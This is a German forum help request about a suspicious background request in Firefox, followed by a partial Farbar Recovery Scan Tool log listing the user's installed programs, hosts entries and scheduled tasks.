|
Log-Analyse und Auswertung: Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger WebsiteWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML |
27.05.2015, 11:01 | #1 |
| Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website Ich habe folgendes festgestellt: Als ich in der Konsole des Firefox (38.0.1) war, fiel mir auf, dass nach Ende der Ladezeit einer Website ein HTTP GET Request an eine Seite gesendet wurde, die von Bitdefender Total Security 2015 blockiert wurde. So in etwa sieht das aus (in diesem Fall rufe ich die vertrauenswürdige Seite Wolfram|Alpha auf): Dieses "Dealdo" (kommt in der Adresse vor) scheint ein dubioser Erotik-Online-Shop zu sein. (Ich habe nur die Facebook-Seite besucht) Hier eine Liste meiner Firefox Addons und Plugins: https://imgur.com/a/G8AbP Addition.txt Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-05-2015 Ran by Ruben at 2015-05-27 11:23:48 Running from C:\Users\Ruben\Downloads Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-2798130160-1945478871-1923780282-500 - Administrator - Disabled) Gast (S-1-5-21-2798130160-1945478871-1923780282-501 - Limited - Disabled) Ruben (S-1-5-21-2798130160-1945478871-1923780282-1001 - Administrator - Enabled) => C:\Users\Ruben ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.) 7-Zip 9.38 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0938-000001000000}) (Version: 9.38.00.0 - Igor Pavlov) Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated) Apple Application Support (32-Bit) (HKLM-x32\...\{447CDCE5-F555-429B-BFA6-642C3C6D684F}) (Version: 3.1.2 - Apple Inc.) Apple Application Support (64-Bit) (HKLM\...\{0DF7096B-715A-4233-8633-C7A16ED6D616}) (Version: 3.1.2 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.3.757 - Bandisoft.com) Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com) Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 18.21.0.1497 - Bitdefender) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform) Curse (HKLM-x32\...\{1F2611FB-6F69-4AA8-BECD-243BD8CB45F3}) (Version: 6.0.0.0 - Curse) DB Browser for SQLite (HKLM-x32\...\SqliteBrowser3) (Version: 3.5.1 - oldsch00l) DisplayFusion 7.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 7.1.0.0 - Binary Fortress Software) Dropbox (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\Dropbox) (Version: 3.4.6 - Dropbox, Inc.) Druckerdeinstallation für EPSON PX710W Series (HKLM\...\EPSON PX710W Series) (Version: - SEIKO EPSON Corporation) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - ) FDUx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden FileZilla Client 3.11.0.1 (HKLM-x32\...\FileZilla Client) (Version: 3.11.0.1 - Tim Kosse) Finale 2014d DEMO (HKLM-x32\...\Finale 2014) (Version: 2014.4.5030.2 - MakeMusic) Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic) Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.4.96.511 - Foxit Software Inc.) Foxit PhantomPDF Standard (HKLM-x32\...\{365A8436-22A8-47BF-B1B9-6A6CDAA465CE}) (Version: 7.0.8.1216 - Foxit Software Inc.) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.0.8.1216 - Foxit Software Inc.) Genymotion version 2.4.0 (HKLM\...\{6D180286-D4DF-40EF-9227-923B9C07C08A}_is1) (Version: 2.4.0 - Genymobile) GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team) Git version 1.9.5-preview20150319 (HKLM-x32\...\Git_is1) (Version: 1.9.5-preview20150319 - The Git Development Community) HexChat (HKLM\...\HexChat_is1) (Version: 2.10.2 - HexChat) iExplorer 3.7.3.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation) IntelliJ IDEA Community Edition 14.1.3 (HKLM-x32\...\IntelliJ IDEA Community Edition 14.1.3) (Version: 141.1010.3 - JetBrains s.r.o.) iTunes (HKLM\...\{D227565A-0033-40AD-89BA-653A205CDC11}) (Version: 12.1.1.4 - Apple Inc.) Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.14 - Oracle Corporation) JetBrains PhpStorm 8.0.3 (HKLM-x32\...\PhpStorm 8.0.3) (Version: 139.1348 - JetBrains s.r.o.) Jitsi (HKLM-x32\...\{DBA37B35-10E9-484D-8AF6-2BB1FC734590}) (Version: 2.8.5426 - Jitsi) Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.) Macrium Reflect Free Edition (Version: 5.3.7290 - Paramount Software (UK) Ltd.) Hidden Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version: - Mathias Kunter) MediaMonkey 4.1 (HKLM-x32\...\MediaMonkey_is1) (Version: 4.1 - Ventis Media Inc.) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Office Professional Plus 2013 - de-de (HKLM\...\ProPlusRetail - de-de) (Version: 15.0.4719.1002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\OneDriveSetup.exe) (Version: 17.3.5860.0512 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 38.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 38.0.1 (x86 de)) (Version: 38.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 36.0.4 - Mozilla) Networkx64 (Version: 1.0.0 - Sony Corporation) Hidden Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.7.8.2 - Notepad++ Team) NVIDIA 3D Vision Treiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 352.86 - NVIDIA Corporation) NVIDIA GeForce Experience 2.4.3.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.31 - NVIDIA Corporation) NVIDIA Grafiktreiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 352.86 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation) Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Oracle VM VirtualBox 4.3.26 (HKLM\...\{5771F59A-BFC9-4FAF-A883-7642EF4BA3C3}) (Version: 4.3.26 - Oracle Corporation) PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.0 - pdfforge) Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications) QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.) Restore (x32 Version: 1.0.0 - Sony Corporation) Hidden SCS Shortcut (x32 Version: 1.0 - Sony Creative Software Inc.) Hidden ShareX 9.10.1 (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 9.10.1 - ShareX Developers) SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.4.3.31 - NVIDIA Corporation) Hidden Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.) SSLx64 (Version: 1.0.0 - Sony Corporation ) Hidden SSLx86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden Start Menu 8 (HKLM-x32\...\IObit_StartMenu8_is1) (Version: 2.2.0 - IObit) SuperD spd2900gs (HKLM-x32\...\{B4D7DF2F-5FD7-4908-A098-298CE9898A8D}) (Version: 1.0.2102.1004 - SuperD Co., Ltd.) SuperD X-Tune (HKLM-x32\...\{2730EB73-8EEF-447F-82A0-16497631386A}) (Version: 1.0.2101.1003 - SuperD Co., Ltd.) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.41459 - TeamViewer) Ultra Defragmenter (HKLM-x32\...\UltraDefrag) (Version: 6.0.4 - UltraDefrag Development Team) VAIO Care (HKLM\...\{EF649526-0134-46A8-8DF3-D7F9309E48DB}) (Version: 8.4.2.12046 - Sony Corporation) VAIO Care Recovery (HKLM\...\{15B9204E-BA09-485E-8F2C-094AC0077664}) (Version: 1.1.2.13230 - Sony Corporation) VAIO Care-Hardwarediagnose-Plugin (HKLM-x32\...\{EC153498-00E1-4C9C-89BE-81527C6750BE}) (Version: 4.11.1.11220 - Sony Corporation) VAIO Control Center (HKLM-x32\...\{8E797841-A110-41FD-B17A-3ABC0641187A}) (Version: 6.0.0.08280 - Sony Corporation) VAIO Data Restore Tool (HKLM-x32\...\{57B955CE-B5D3-495D-AF1B-FAEE0540BFEF}) (Version: 1.10.0.07270 - Sony Corporation) VAIO Easy Connect (x32 Version: 8.2.0.14170 - Sony Corporation) Hidden VAIO Gesture Control (HKLM-x32\...\{692955F2-DE9F-4078-8FAA-858D6F3A1776}) (Version: 2.0.0.08240 - Sony Corporation) VAIO Gesture Control (x32 Version: 2.0.0.08240 - Sony Corporation) Hidden VAIO Improvement (HKLM-x32\...\{3A26D9BD-0F73-432D-B522-2BA18138F7EF}) (Version: 2.0.0.08090 - Sony Corporation) VAIO Media Server Settings (HKLM\...\{62A172B2-550E-499D-9A82-5190D18390AA}) (Version: 1.0.2.11060 - Sony Corporation) VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 7.0.1.02280 - Sony Corporation) VAIO*CPU-Lüfterdiagnose (HKLM-x32\...\{BCE6E3D7-B565-4E1B-AC77-F780666A35FB}) (Version: 1.1.0.09200 - Sony Corporation) VAIO-Handbuch (HKLM-x32\...\{C6E893E7-E5EA-4CD5-917C-5443E753FCBD}) (Version: 3.0.0.08100 - Sony Corporation) VAIO-Support für Übertragungen (HKLM-x32\...\{5DDAFB4B-C52E-468A-9E23-3B0CEEB671BF}) (Version: 1.8.0.08212 - Sony Corporation) VCCx64 (Version: 1.0.0 - Sony Corporation) Hidden VCCx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VHD (x32 Version: 1.0.0 - Sony Corporation) Hidden VIx64 (Version: 1.0.0 - Sony Corporation) Hidden VIx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN) VMLx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VPMx64 (Version: 1.0.0 - Sony Corporation ) Hidden VSSTx64 (Version: 1.0.0 - Sony Corporation ) Hidden VSSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden VueScan x64 (HKLM\...\VueScan x64) (Version: - ) VWSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden Wireshark 1.12.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.5 - The Wireshark developer community, hxxp://www.wireshark.org) XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami) X-Lite (HKLM-x32\...\{8698D30E-8FFC-4BCD-A13A-3DAB86C0D42E}) (Version: 48.7.6464 - CounterPath Corporation) XMedia Recode Version 3.2.2.4 (HKLM-x32\...\{DDA3C325-47B2-4730-9672-BF3771C08799}_is1) (Version: 3.2.2.4 - XMedia Recode) X-Mouse Button Control 2.10.2 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.10.2 - Highresolution Enterprises) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{654a14c2-f1da-4026-b8f4-6e6dac64644c}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ca586c80-7c84-4b88-8537-726724df6929}\InprocServer32 -> C:\Program Files (x86)\Git\git-cheetah\git_shell_ext64.dll () CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\17.3.5860.0512\amd64\FileSyncApi64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) ==================== Restore Points ========================= 13-05-2015 07:25:51 Windows Update 18-05-2015 12:03:04 Removed Java 8 Update 45 23-05-2015 18:10:19 Installed Jitsi ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 15:25 - 2015-04-15 17:49 - 00001550 ____A C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 onhax.net 127.0.0.1 www.onhax.net 127.0.0.1 forum.onhax.net 127.0.0.1 https://forum.onhax.net 127.0.0.1 labs.onhax.net 127.0.0.1 do2dear.net 127.0.0.1 p30world.com 127.0.0.1 brarstuff.com 127.0.0.1 rsload.net 127.0.0.1 bandicam.com 127.0.0.1 ssl.bandisoft.com 127.0.0.1 idm-crack-patch.blogspot.in 127.0.0.1 parth8641.blogspot.com 127.0.0.1 www.hamrick.com 127.0.0.1 static.hamrick.com 127.0.0.1 stats.hamrick.com ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {03C91028-657D-4423-ACB7-5B756163654A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-05-14] (Microsoft Corporation) Task: {0B28ACAA-4BDE-435A-82C4-3D97F02769E5} - System32\Tasks\Microsoft Office 15 Sync Maintenance for RubensVaio-Ruben RubensVaio => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2015-03-10] (Microsoft Corporation) Task: {1E57804B-1ED4-4D5D-9106-B4AF2F176224} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2014-02-28] (Sony Corporation) Task: {20861EEF-3A03-42F4-A838-FDC40C7C9A12} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {24A595BD-D1B1-4EFA-A1E8-8CAECF20EB42} - System32\Tasks\USER_ESRV_SVC => Wscript.exe //B //NoLogo "C:\Program Files\Sony\VAIO Care\ESRV\task.vbs" Task: {271304AE-4247-4B0B-85EA-0AC3419AB74D} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-05-19] (Adobe Systems Incorporated) Task: {32CA79B8-D216-44F2-AEAB-903ADF0C94C8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation) Task: {3321A6D4-11EA-46DB-9302-9168FFCACFE3} - System32\Tasks\Sony Corporation\VAIO Care\VCCheckIolo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {355229AC-40E8-4FB5-B14C-47DDAE6BB1BF} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {4BBBB335-FA93-441D-B6C2-36D9AB317B37} - System32\Tasks\Sony Corporation\VAIO Care\VCMetrics => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {51D843BE-4E3A-4A98-985D-8C4CF538B8DD} - System32\Tasks\Sony Corporation\VAIO Care\UpdateSolution => C:\Program Files\Sony\VAIO Care\Solution.Updater.exe [2014-12-03] (Sony Corporation) Task: {61130F71-8742-45D6-A4E1-FB637B1921F6} - System32\Tasks\Sony Corporation\VAIO Gesture Control\VCGULogonTask => C:\Program Files (x86)\Sony\VAIO Camera Gesture Utility\VCGU.exe [2012-08-04] (Sony Corporation) Task: {6FE63A85-9C0B-4320-84A4-CD51083C79B6} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {765339AF-3C12-49A4-B1BC-933BD59B9334} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-24] (Microsoft Corporation) Task: {77F73AB1-2BF9-4BAF-B6FD-9403F07EDAFA} - System32\Tasks\Sony Corporation\VAIO Control Center\NetworkSetting\NetworkSetting Logon Start => C:\Program Files (x86)\Sony\VAIO Control Center\NetworkSetting\NetworkClient Task: {7A27FD2C-4200-4E77-B499-56228EAEDD03} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {8F0B6E2A-D772-4017-963D-4D2B18A70033} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorSystem => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation) Task: {952CBAA9-3887-4259-BA73-862AF0AEF16D} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe Task: {95B5A631-5805-4407-96E9-9C6776689825} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe [2012-08-09] (Sony Corporation) Task: {A2EA898B-2E09-4C82-9C64-8EED1FF1DF6E} - System32\Tasks\Sony Corporation\VAIO Care\ActiveStatusCollect => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {A9781B7B-C893-443A-82EB-A9FDEE6000B3} - System32\Tasks\Sony Corporation\VAIO Care\DeployCRMflag => C:\Program Files\Sony\VAIO Care\DeployCRMflag.exe [2014-01-16] (Sony Corporation) Task: {AB90CD73-64F5-45CA-93CD-9DB6BD1E1F1F} - System32\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] () Task: {ACA7E4BC-9D11-4DAC-9C89-915E7E92ACD2} - System32\Tasks\Sony Corporation\VAIO Care\CheckSystemInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {BAD4621D-A636-4B10-9785-ABE52CB0FBF2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation) Task: {C5081CD6-0561-4F2B-8689-285F9C321092} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2798130160-1945478871-1923780282-1001 => %localappdata%\Microsoft\OneDrive\OneDrive.exe Task: {C74A71A1-C1F8-4912-A221-88E2A38C3007} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd) Task: {CB31D35B-2569-4CAE-8356-147FCE026D6F} - System32\Tasks\Sony Corporation\VAIO Care\VCRLog => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {DDA0A5F1-6933-40B4-A7B0-F03F60881A3D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation) Task: {DE6EAFBD-DD25-4EFC-B75F-3545323C2F47} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorUser => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation) Task: {DF0C1261-3171-41F3-8E1D-9D4D045C9465} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe Task: {DF9838E6-ABEF-45E6-82F6-7D9CC9B99852} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation) Task: {E14B16FC-63D8-4C18-9CAC-39BA994EC36D} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update Self Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2014-03-01] (Sony Corporation) Task: {E434E6B4-C0FC-4238-B2A6-EB3A265CB241} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {EBDE38DB-C1AB-496A-89BE-F5AFC1FC3E17} - System32\Tasks\Sony Corporation\VAIO Care\GetPOTInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {EFC29B24-98E1-43F2-A2B7-0AA3FD271A3D} - System32\Tasks\Sony Corporation\VAIO Care\UploadPOT => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: 